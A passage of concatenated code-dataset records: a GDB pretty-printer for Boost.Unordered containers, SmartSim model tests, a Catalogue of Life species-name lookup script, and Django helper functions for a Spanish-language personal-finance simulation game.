If not, see <http://www.gnu.org/licenses/>.\n\nimport gdb\nimport six\n\nclass Unordered(object):\n '''Common representation of Boost.Unordered types'''\n\n def __init__(self, value, extractor):\n self.value = value\n self.extractor = extractor\n self.node_type = None\n self.value_type = None\n self.extra_node = False\n self._init()\n\n def __len__(self):\n table = self.value['table_']\n if table['buckets_']:\n return int(table['size_'])\n else:\n return 0\n\n def __iter__(self):\n table = self.value['table_']\n buckets = table['buckets_']\n if buckets:\n start_bucket = buckets + table['bucket_count_']\n start_node = start_bucket.dereference()['next_']\n if self.extra_node:\n start_node = start_node.dereference()['next_']\n return self._iterator(start_node, self.node_type, self.value_type, self.extractor)\n else:\n return iter([])\n\n def empty(self):\n return not self.value['table_']['buckets_']\n\n def _init(self):\n table = self.value['table_'].type.fields()[0]\n assert table.is_base_class\n buckets = table.type.fields()[0]\n assert buckets.is_base_class\n\n alloc_type = buckets.type.template_argument(0)\n self.value_type = alloc_type.template_argument(0)\n\n bucket_type = buckets.type.template_argument(1).strip_typedefs()\n self.extra_node = (str(bucket_type) == 'boost::unordered::detail::bucket')\n\n self.node_type = buckets.type.template_argument(2)\n\n class _iterator(six.Iterator):\n '''Iterator for Boost.Unordered types'''\n\n def __init__(self, start_node, node_type, value_type, extractor):\n assert start_node\n self.node = None\n self.next_node = start_node\n self.node_type = node_type\n self.value_type = value_type\n self.extractor = extractor\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # sorry, no next node available\n if not self.next_node or self.next_node == self.node:\n raise StopIteration()\n\n # fetch next node\n self.node = self.next_node\n self.next_node = self.node.dereference()['next_']\n\n mapped = self._value()\n return (self.extractor.key(mapped), self.extractor.value(mapped))\n\n def _value(self):\n assert self.node\n node = self.node.dereference().cast(self.node_type)\n return node['data_'].cast(self.value_type)\n\nclass Map(Unordered):\n\n def __init__(self, value):\n super(Map, self).__init__(value, self._extractor())\n\n class _extractor(object):\n\n def key(self, node):\n return node['first']\n\n def value(self, node):\n return node['second']\n\nclass Set(Unordered):\n\n def __init__(self, value):\n super(Set, self).__init__(value, self._extractor())\n\n class _extractor(object):\n\n def key(self, node):\n return None\n\n def value(self, node):\n return node\n\n# vim:set filetype=python shiftwidth=4 softtabstop=4 expandtab:\n","sub_path":"boost/share/boost-gdb-printers/boost/v1_48/lib/unordered.py","file_name":"unordered.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418360184","text":"import pytest\n\nfrom smartsim import Experiment\nfrom smartsim.error import EntityExistsError\nfrom smartsim.settings import RunSettings\n\n\ndef test_register_incoming_entity_preexists():\n exp = Experiment(\"experiment\", launcher=\"local\")\n rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n ensemble = exp.create_ensemble(name=\"ensemble\", replicas=1, run_settings=rs)\n m = exp.create_model(\"model\", run_settings=rs)\n m.register_incoming_entity(ensemble[\"ensemble_0\"])\n assert len(m.incoming_entities) == 1\n with 
pytest.raises(EntityExistsError):\n        m.register_incoming_entity(ensemble[\"ensemble_0\"])\n\n\ndef test_disable_key_prefixing():\n    exp = Experiment(\"experiment\", launcher=\"local\")\n    rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n    m = exp.create_model(\"model\", run_settings=rs)\n    m.disable_key_prefixing()\n    assert m.query_key_prefixing() == False\n\n\ndef test_repr():\n    expr = Experiment(\"experiment\")\n    m = expr.create_model(\"test_model\", run_settings=RunSettings(\"python\"))\n    assert m.__repr__() == \"test_model\"\n\n\ndef test_str():\n    expr = Experiment(\"experiment\")\n    rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n    m = expr.create_model(\"test_model\", run_settings=rs)\n    entity_str = \"Name: \" + m.name + \"\\nType: \" + m.type + \"\\n\" + str(rs)\n    assert m.__str__() == entity_str\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"630923856","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 21 15:06:33 2011\r\n\r\n@author: Vladimir\r\n\"\"\"\r\n\r\nfrom xml.etree import cElementTree as etree\r\nfrom urllib2 import urlopen\r\n\r\n# path to the input file: a newline-separated list of species scientific\r\n# names to check for validity, one per line in FISH1+FISH2 format,\r\n# e.g. \"Theragra+chalcogramma\\n\"\r\nINfile = 'C:/pysyn/listnames.txt'\r\n# path to the output file for results\r\nOUTfile = open('C:/pysyn/CoLanswers.txt', 'w')\r\n# write header with col names\r\nOUTfile.write('sp,stat,url\\n')\r\n# base part of the URL for querying names in the Catalogue of Life\r\nbaseUrl = \"http://www.catalogueoflife.org/col/webservice?name=\"\r\n\r\ndef ask_CoL(url):\r\n    tree = etree.parse(urlopen(url))\r\n    el = tree.find('result')\r\n    if el is not None:\r\n        lst = [el.findtext(tag) or '' for tag in \"name name_status url\".split()]\r\n        return ','.join(lst)\r\n    else:\r\n        return 'NA'\r\n\r\n\r\ndef main():\r\n    # read species names into a list\r\n    names = open(INfile).read().splitlines()\r\n\r\n    # walk the list and collect the Catalogue of Life answers\r\n    \r\n    for askSp in names:\r\n        url = baseUrl + askSp\r\n        string = ask_CoL(url)\r\n        if string != 'NA':\r\n            print(str(names.index(askSp)) + ' - done - ' + askSp)\r\n            OUTfile.write(string)\r\n        else:\r\n            print(str(names.index(askSp)) + ' --- NA - ' + askSp)\r\n    OUTfile.close()\r\n    \r\n# Standard boilerplate to call the main() function to begin\r\n# the program.\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"asknames.py","file_name":"asknames.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498351605","text":"import pandas as pd\nimport numpy as np\nfrom .models import *\nimport random\nfrom decimal import Decimal\nimport re\n###################################################################\n\n###################################################################\n\"\"\"\nEventos\n\"\"\"\n\ndef modifyEvento(user, eventos):\n    if eventos != None:\n        for evento in eventos:\n            if evento != {}:\n                changefrecuencia = Evento_User.objects.get(User=user.id, Evento=evento['Evento_id'])\n                Evento_User.objects.filter(User=user.id, Evento=evento['Evento_id']).update(Frecuencia=changefrecuencia.Frecuencia - 1)\n    \ndef eventoAfecta(user, eventos):\n    
afectaList = []\n\n if eventos != None:\n for evento in eventos:\n if evento != {}:\n afecta_evento = Evento_Afecta.objects.filter(Evento=evento['Evento_id'])\n for afecta in afecta_evento:\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n afecta_usuario = Afecta_user(User=user, Descripcion=evento[\"Descripcion\"], Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n return afectaList\n\ndef getAfectaEvento(response):\n\n for i in response:\n if i != {}:\n i['Afecta'] = []\n evento = Evento.objects.filter(id = i[\"Evento_id\"]).first()\n afectas = Evento_Afecta.objects.filter(Evento = evento)\n for afecta in afectas:\n periodo = str(afecta.Periodo)\n if afecta.Periodo.Turnos < 0:\n periodo = \"Exclusivo\"\n duracion = afecta.Duracion\n if afecta.Duracion > 1000:\n duracion = \"Infinito\"\n i['Afecta'].append({\"Afecta\": afecta.Afecta.TipoAfect, \"Cantidad\": afecta.Cantidad, \"Periodo\":periodo, \"Duracion\":duracion})\n\n\ndef verificarRequisitos(id, turno, flag_tipo):\n if(flag_tipo == 'Pregunta'):\n requisitos = Preguntas_Requisitos.objects.filter(Preguntas_id = id)\n else:\n requisitos = Evento_Requisitos.objects.filter(Evento = id)\n if not requisitos:\n return True\n else:\n for requisito in requisitos:\n req = str(requisito.Requisito)\n cant = str(requisito.Cantidad)\n if (req == 'Felicidad'):\n if(cant[0] == '>'):\n if(turno.Felicidad > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Felicidad < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Felicidad >= int(cant.split('-')[0])) and (turno.Felicidad <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if (turno.Felicidad == int(cant.split('=')[1]) ):\n pass\n else:\n return False\n \n elif (req == 'Ingresos'):\n if(cant[0] == '>'):\n if(turno.Ingresos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Ingresos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.Ingresos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Ingresos >= int(cant.split('-')[0])) and (turno.Ingresos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n \n elif (req == 'NumeroTurnos'):\n if(cant[0] == '>'):\n if(turno.NumeroTurnos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.NumeroTurnos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.NumeroTurnos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.NumeroTurnos >= int(cant.split('-')[0])) and (turno.NumeroTurnos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n elif (req == 'DineroEfectivo'):\n if(cant[0] == '>'):\n if(turno.NumeroTurnos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.NumeroTurnos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.NumeroTurnos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.NumeroTurnos >= int(cant.split('-')[0])) and (turno.NumeroTurnos <= int(cant.split('-')[1]))):\n pass\n else:\n return 
False\n elif (req == 'Egresos'):\n if(cant[0] == '>'):\n if(turno.Egresos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Egresos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.Egresos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Egresos >= int(cant.split('-')[0])) and (turno.Egresos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n return True\n\ndef getSeleccion(queryset, tipoEvento, eventos, turno):\n df = pd.DataFrame(list(queryset.values()))\n df['FrecuenciaAcumulada'] = df['Frecuencia'].cumsum()\n limite_inferior = df['FrecuenciaAcumulada'].min()\n limite_superior = df['FrecuenciaAcumulada'].max()\n seleccion = random.uniform(limite_inferior,limite_superior)\n df = df.sample(frac=1).reset_index(drop=True)\n for index, row in df.iterrows():\n if ((row['FrecuenciaAcumulada'] >= seleccion) and (verificarRequisitos(row['Evento_id'], turno,'Evento'))):\n desc = Evento.objects.get(id=row['Evento_id'])\n desc = str(desc.Descripcion)\n temp = row[['Evento_id']].to_dict()\n temp['Descripcion'] = desc\n if(tipoEvento == 'Micro'):\n temp['TipoEvento'] = 'Micro'\n eventos.append(temp)\n break\n else:\n temp['TipoEvento'] = 'Macro'\n eventos.append(temp)\n break\n else:\n pass\n\n\n\ndef seleccionEvento(user):\n turno = Turnos.objects.filter(User=user).first()\n eventos = []\n seleccion = 0\n eventosDisp = Evento_User.objects.values_list('Evento','Frecuencia','TipoEvento').exclude(Frecuencia=0)\n micro_id = TipoEvento.objects.get(TipoEvento = 'Micro').pk\n query_micro = eventosDisp.filter(TipoEvento=micro_id, User=user)\n if not query_micro:\n return eventos.append({})\n getSeleccion(query_micro, 'Micro', eventos, turno)\n seleccion = random.uniform(0,1)\n if(seleccion >= .7):\n macro_id = TipoEvento.objects.get(TipoEvento = 'Macro').pk\n query_macro = eventosDisp.filter(TipoEvento=macro_id, User=user)\n getSeleccion(query_macro, 'Macro', eventos, turno)\n else:\n eventos.append({})\n return eventos\n\n###################################################################\n\n###################################################################\n\"\"\"\nPREGUNTA\n\"\"\"\n\ndef modifyPregunta(user, pregunta):\n preguntaUser = Preguntas_User.objects.get(User=user.id, Pregunta=pregunta.id)\n Preguntas_User.objects.filter(User=user.id, Pregunta=pregunta.id).update(Frecuencia=preguntaUser.Frecuencia - 1)\n\ndef preguntaAfecta(user, pregunta):\n afectaList = []\n afecta_pregunta = Preguntas_Afecta.objects.filter(Preguntas=pregunta)\n tipoInversion = TipoPregunta.objects.filter(id=pregunta.TipoPreguntas.id).first()\n for afecta in afecta_pregunta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n if tipoInversion.SaldoInversion != 'GananciaCapital':\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n afecta_usuario = Afecta_user(User=user, Descripcion=pregunta.Descripcion, Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n else:\n if str(afecta.Afecta) == 'DineroEfectivo' and afecta.Periodo.Turnos != -1:\n rangoRendimiento = (tipoInversion.TasaRendimiento).split(\" \")\n limite_inferior = float(rangoRendimiento[0])\n limite_superior = float(rangoRendimiento[2])\n tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n cantidad = (Decimal(afecta.Cantidad) * 
-1)\n inversionPregunta = InversionPregunta(User=user, Descripcion=pregunta.Descripcion, TipoInversion=tipoInversion, SaldoInicial=cantidad, InicialMasAportacion=cantidad, EventoExterno=0, TazaRendimiento=tasaRendimiento, Aportacion=0, SaldoActual=cantidad, SaldoInvercion= tipoInversion.SaldoInversion)\n inversionPregunta.save()\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n afecta_usuario = Afecta_user(User=user, Descripcion=pregunta.Descripcion, Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n return afectaList\n\ndef validarPregunta(user, pregunta):\n turno = Turnos.objects.filter(User=user).first()\n afecta_pregunta = Preguntas_Afecta.objects.filter(Preguntas=pregunta)\n for afecta in afecta_pregunta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n if duracion.Turnos == -1:\n if str(afecta.Afecta) == 'DineroEfectivo':\n if turno.DineroEfectivo < Decimal(afecta.Cantidad):\n return False\n if str(afecta.Afecta) == 'Felicidad':\n if turno.Felicidad < afecta.Felicidad:\n return False\n if str(afecta.Afecta) == 'Egresos':\n if turno.Egresos < afecta.Egresos:\n return False\n if str(afecta.Afecta) == 'Ingresos':\n if turno.Ingresos < afecta.Ingresos:\n return False\n return True\n \ndef getAfectaPregunta(response):\n for i in response:\n if i != {}:\n i['Afecta'] = []\n pregunta = Preguntas.objects.filter(id = i[\"Pregunta_id\"]).first()\n afectas = Preguntas_Afecta.objects.filter(Preguntas = pregunta)\n for afecta in afectas:\n if afecta.Periodo.Turnos != -1:\n periodo = str(afecta.Periodo)\n if afecta.Periodo.Turnos < 0:\n periodo = \"Exclusivo\"\n duracion = afecta.Duracion\n if afecta.Duracion > 1000:\n duracion = \"Infinito\"\n i['Afecta'].append({\"Afecta\": afecta.Afecta.TipoAfect, \"Cantidad\": afecta.Cantidad, \"Periodo\":periodo, \"Duracion\":duracion})\n\ndef afectaInversion(afecta, user):\n listaInversionAfecta = ['Telecomunicaciones', 'Tecnologia', 'Construccion', 'Bienes_Raices']\n if str(afecta.Afecta) in listaInversionAfecta:\n inversionesAcciones = Inversion.objects.filter(TipoEmpresa=afecta.Afecta, User=user)\n for inversion in inversionesAcciones:\n inversion.EventoExterno = afecta.Cantidad\n inversion.save()\n #Checar como funciona el Evento externo en inversinPregunta\n return False\n else:\n if str(afecta.Afecta) == \"GananciaCapital\":\n inversionesPregunta = InversionPregunta.objects.filter(User=user)\n if int(len(inversionesPregunta)) > 0:\n seleccion = random.randint(int(1),int(len(inversionesPregunta))) -1\n else: seleccion = 1\n cont = 1\n for inversion in inversionesPregunta:\n if cont == seleccion:\n inversion.EventoExterno = afecta.Cantidad\n inversion.save()\n cont = cont + 1\n\n return True\n\ndef getSeleccionPregunta(queryset, tipoEvento, preguntas, turno):\n df = pd.DataFrame(list(queryset.values()))\n df['FrecuenciaAcumulada'] = df['Frecuencia'].cumsum()\n df = df.sample(frac=1).reset_index(drop=True)\n for x in range(0,4,1):\n limite_inferior = df['FrecuenciaAcumulada'].min()\n limite_superior = df['FrecuenciaAcumulada'].max()\n borrar = -10\n seleccion = random.uniform(limite_inferior,limite_superior)\n for index, row in df.iterrows():\n if ((row['FrecuenciaAcumulada'] >= seleccion) and (verificarRequisitos(row['Pregunta_id'], turno, 'Pregunta'))):\n desc = Preguntas.objects.get(id=row['Pregunta_id'])\n desc = str(desc.Descripcion)\n descTipo = 
TipoPregunta.objects.get(id=row['TipoPreguntas_id'])\n descTipo = str(descTipo.TipoPregunta).split('_')[0]\n temp = row[['Pregunta_id']].to_dict()\n temp['Descripcion'] = desc\n temp['TipoPregunta'] = descTipo\n preguntas.append(temp)\n borrar = index\n df.drop(borrar, inplace = True, errors = 'ignore' )\n borrar = -10\n break\n else:\n pass\n\n \n\ndef seleccionPregunta(user):\n turno = Turnos.objects.filter(User=user).first()\n preguntas = []\n PreguntasDisp = Preguntas_User.objects.values_list('Pregunta','Frecuencia','TipoPreguntas').exclude(Frecuencia=0)\n inversion_id = TipoPregunta.objects.values_list('id',flat=True).filter(TipoPregunta__startswith = 'Inversion')\n diversion_id = TipoPregunta.objects.get(TipoPregunta = 'Diversion').pk\n bienes_id = TipoPregunta.objects.get(TipoPregunta = 'Bienes Personales').pk\n laboral_id = TipoPregunta.objects.get(TipoPregunta= 'Laboral').pk\n query_inversion = PreguntasDisp.filter(TipoPreguntas__in=inversion_id, User=user)\n query_diversion = PreguntasDisp.filter(TipoPreguntas=diversion_id,User=user)\n query_bienes = PreguntasDisp.filter(TipoPreguntas=bienes_id,User=user)\n query_laboral = PreguntasDisp.filter(TipoPreguntas=laboral_id,User=user)\n getSeleccionPregunta(query_inversion, 'Inversion', preguntas, turno)\n getSeleccionPregunta(query_diversion, 'Diversion', preguntas, turno)\n getSeleccionPregunta(query_bienes, 'Bienes Personales', preguntas, turno)\n getSeleccionPregunta(query_laboral, 'Laboral', preguntas, turno)\n return preguntas \n\n###################################################################\n\n###################################################################\n\"\"\"\nINICIO DE TURNO\n\"\"\"\ndef afectaTurnoinstantaneo(afectaActions, turno):\n for afecta in afectaActions:\n afecta.TurnosRestante = afecta.TurnosRestante - 1\n afecta.save()\n if afecta.TurnosRestante <= 0:\n afecta.Duracion = afecta.Duracion - 1\n afecta.save()\n if afecta.TurnosEsperar <= 0:\n afecta.delete()\n else:\n if afecta.Cantidad[0] == '%':\n cantidadAfecta = afecta.Cantidad[1:]\n if cantidadAfecta[0] == '-':\n cantidadAfecta = cantidadAfecta[1:]\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, False)\n else:\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, True)\n else:\n modifyTurno(turno, afecta.Afecta, afecta.Cantidad, False, True)\n afecta.TurnosRestante = afecta.TurnosEsperar\n afecta.save()\n turno.save()\n if afecta.Duracion <= 0: \n afecta.delete()\n\n#Se aplican todos los afectas relacionados con el usuario\ndef afectaTurnos(user, turno):\n \n afectaActions = Afecta_user.objects.filter(User=user)\n for afecta in afectaActions:\n afecta.TurnosRestante = afecta.TurnosRestante - 1\n afecta.save()\n if afecta.TurnosRestante <= 0:\n afecta.Duracion = afecta.Duracion - 1\n afecta.save()\n if afecta.TurnosEsperar <= 0:\n afecta.delete()\n else:\n if afecta.Cantidad[0] == '%':\n cantidadAfecta = afecta.Cantidad[1:]\n if cantidadAfecta[0] == '-':\n cantidadAfecta = cantidadAfecta[1:]\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, False)\n else:\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, True)\n else:\n modifyTurno(turno, afecta.Afecta, afecta.Cantidad, False, True)\n afecta.TurnosRestante = afecta.TurnosEsperar\n afecta.save()\n turno.save()\n if afecta.Duracion <= 0: \n afecta.delete()\n \n#Es la forma en la que se modifica el turno actual del usuario (Se puede cambiar) \ndef modifyTurno(turno, afecta, cantidad, porcentaje, suma):\n if afecta == 'Felicidad':\n if porcentaje:\n if suma:\n turno.Felicidad 
= turno.Felicidad + (turno.Felicidad * Decimal(float(cantidad)/100))\n turno.save()\n return True\n turno.Felicidad = turno.Felicidad - (turno.Felicidad * Decimal(float(cantidad)/100))\n turno.save()\n return True\n turno.Felicidad = turno.Felicidad + Decimal(cantidad)\n turno.save()\n return True\n\n elif afecta == 'DineroEfectivo':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n return True\n elif afecta == 'Sueldo':\n sueldoActual = Afecta_user.objects.filter(User=turno.User, Afecta='SueldoReal').first()\n if porcentaje:\n if suma:\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) + (Decimal(sueldoActual.Cantidad) * Decimal(float(cantidad)/100)))\n sueldoActual.save()\n return True\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) - (Decimal(sueldoActual.Cantidad) * Decimal(float(cantidad)/100)))\n sueldoActual.save()\n return True\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) + Decimal(cantidad))\n sueldoActual.save()\n return True\n elif afecta == 'SueldoReal':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n ######################\n elif afecta == 'EgresoPersonal':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n #####################\n elif 'Inversion' in str(afecta):\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n elif afecta == 'Ingresos':\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n elif afecta == 'Egresos':\n turno.DineroEfectivo = turno.DineroEfectivo - Decimal(cantidad)\n\ndef turnoIngresosEgresos(user, turno):\n \n prestamos = Prestamo.objects.filter(User = user)\n inversiones = Inversion.objects.filter(User = user)\n ingresos = Afecta_user.objects.filter(Afecta = 'Ingresos', User = user)\n egresos = Afecta_user.objects.filter(Afecta = 'Egresos', User = user)\n inversionesAfecta = Afecta_user.objects.filter(Afecta__startswith = 'Inversion', User = user)\n inversionPregunta = InversionPregunta.objects.filter(User = user)\n sueldoActual = Afecta_user.objects.filter(User=user, Afecta='SueldoReal').first()\n \n turnoEgresos = Decimal(8000)\n turnoIngresos = Decimal(sueldoActual.Cantidad)\n\n for prestamo in prestamos:\n turnoEgresos = turnoEgresos + Decimal(prestamo.Mensualidad)\n\n \n #No es un ingreso por que no lo recibes mensualmente\n \"\"\"\n for inversion in inversiones:\n turnoIngresos = turnoIngresos + inversion.SaldoActual\n \"\"\"\n\n for ingreso in ingresos:\n portafolioCantidad = afectaMensual(ingreso)\n turnoIngresos = turnoIngresos + portafolioCantidad\n\n for egreso in egresos:\n portafolioCantidad = afectaMensual(egreso)\n turnoEgresos = turnoEgresos + Decimal(portafolioCantidad)\n\n for inversion in inversionesAfecta:\n portafolioCantidad = 
afectaMensual(inversion)\n        turnoIngresos = turnoIngresos + portafolioCantidad\n\n    # Not an income, because it is not received monthly\n    \"\"\"\n    for inversion in inversionPregunta:\n        turnoIngresos = turnoIngresos + inversion.SaldoActual\n    \"\"\"\n    \n    turno.Ingresos = turnoIngresos\n    turno.Egresos = turnoEgresos\n    turno.save()\n\ndef afectaMensual(afecta):\n    if afecta.TurnosEsperar > 4:\n        numDividir = afecta.TurnosEsperar / 4\n        afectaCantidad = Decimal(afecta.Cantidad) / Decimal(numDividir)\n    elif afecta.TurnosEsperar == 2:\n        afectaCantidad = Decimal(afecta.Cantidad) * 2\n    elif afecta.TurnosEsperar == 1:\n        afectaCantidad = Decimal(afecta.Cantidad) * 4\n    else:\n        afectaCantidad = Decimal(afecta.Cantidad)\n    return Decimal(afectaCantidad)\n\n\ndef prestamosTurnos(user, turno, prestamos):\n\n    for prestamo in prestamos:\n        if prestamo.Frecuencia <= 0:\n            turno.DineroEfectivo = turno.DineroEfectivo - prestamo.Mensualidad\n            tipoPrestamo = prestamo.idPrestamo\n            tipoPrestamo = TipoPrestamo.objects.filter(idPrestamo=str(tipoPrestamo)).first()\n\n            interes = re.sub('%', '', str(tipoPrestamo.TazaInteres))\n            interes = float(interes)/100\n            interesMensual = prestamo.SaldoAbsoluto * Decimal(interes/12)\n\n            prestamo.SaldoAbsoluto = prestamo.SaldoAbsoluto - (prestamo.Mensualidad - interesMensual)\n\n            if prestamo.SaldoAbsoluto < prestamo.Mensualidad:\n                prestamo.Mensualidad = prestamo.SaldoAbsoluto\n\n            # recompute the monthly interest on the reduced balance\n            interes = re.sub('%', '', str(tipoPrestamo.TazaInteres))\n            interes = float(interes)/100\n            interesMensual = prestamo.SaldoAbsoluto * Decimal(interes/12)\n\n            prestamo.Frecuencia = 3\n            prestamo.Interes = interesMensual\n            prestamo.save()\n\n            if prestamo.SaldoAbsoluto <= 0:\n                prestamo.delete()\n            turno.save()\n        else:\n            prestamo.Frecuencia = prestamo.Frecuencia - 1\n            prestamo.save()\n\n    \n\ndef inversionesTurnos(user, turno, inversiones):\n\n    for inversion in inversiones:\n        compania = TipoInversiones.objects.filter(id=inversion.TipoInversion.id).first()\n\n        rangoRendimiento = (compania.RangoRendimiento).split(\" \")\n        limite_inferior = float(rangoRendimiento[0])\n        limite_superior = float(rangoRendimiento[2])\n        tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n\n        if float(inversion.EventoExterno) != 0:\n            inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.EventoExterno))\n            inversion.EventoExterno = 0  # reset after applying the external event\n            inversion.save()\n\n        inversion.TasaRendimiento = tasaRendimiento\n        inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.TasaRendimiento))\n        inversion.save()\n\ndef inversionesPreguntasTurnos(user, turno, inversionesPregunta):\n    for inversion in inversionesPregunta:\n        tipoInversion = TipoPregunta.objects.filter(id=inversion.TipoInversion.id).first()\n\n        rangoRendimiento = (tipoInversion.TasaRendimiento).split(\" \")\n        limite_inferior = float(rangoRendimiento[0])\n        limite_superior = float(rangoRendimiento[2])\n        tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n\n        if float(inversion.EventoExterno) != 0:\n            inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.EventoExterno))\n            inversion.EventoExterno = 0  # reset after applying the external event\n            inversion.save()\n\n        ###### see the professor's video to fully understand how this works ######\n        inversion.TazaRendimiento = tasaRendimiento\n        inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.TazaRendimiento))\n        
inversion.save()\n\n###################################################################\n\n###################################################################\n\ndef riesgoInversion(rangoRendimiento):\n rango = rangoRendimiento.split(\" \")\n limBajo = float(rango[0])\n limAlto = float(rango[2])\n\n if limBajo < 0 and limAlto <= 0:\n return \"Muy Bajo\"\n elif limBajo < 0 and limAlto + limBajo <= 0 and limAlto - limBajo > 1:\n return \"Muy Bajo\"\n elif limBajo < 0 and limAlto + limBajo <= 0 and limAlto - limBajo > .5:\n return \"Bajo\"\n elif limBajo < 0:\n return \"Medio\"\n elif limAlto - limBajo < .2:\n return \"Alto\"\n return \"Muy Alto\"\n\n\n###################################################################\n\n###################################################################\n\ndef borrarInfoUser(user):\n prestamos = Prestamo.objects.filter(User=user)\n afecta = Afecta_user.objects.filter(User=user)\n turno = Turnos.objects.filter(User=user)\n inversiones = Inversion.objects.filter(User = user)\n inversionPregunta = InversionPregunta.objects.filter(User = user)\n preguntas = Preguntas_User.objects.filter(User = user)\n eventos = Evento_User.objects.filter(User = user)\n\n\n eventos.delete()\n preguntas.delete()\n inversionPregunta.delete()\n inversiones.delete()\n turno.delete()\n afecta.delete()\n prestamos.delete()\n\ndef reiniciarUser(user):\n\n #Crear turno actual del usuario\n newTurno = Turnos(NumeroTurnos=0, Felicidad=50, DineroEfectivo=20000, Ingresos=1000, Egresos=0, Sueldo=15000, User=user)\n newTurno.save()\n\n #Crear relacion con todos los eventos\n eventos = Evento.objects.all()\n for event in eventos:\n user_event = Evento_User(User=user, Evento=event, Frecuencia=event.Frecuencia, TipoEvento=event.TipoEvento)\n user_event.save()\n\n #Crear relacion con todas las preguntas\n preguntas = Preguntas.objects.all()\n for pregu in preguntas:\n user_pregu = Preguntas_User(User=user, Pregunta=pregu, Frecuencia=pregu.Frecuencia, TipoPreguntas=pregu.TipoPreguntas)\n user_pregu.save()\n \n #Crear afecta de sueldo\n user_afecta = 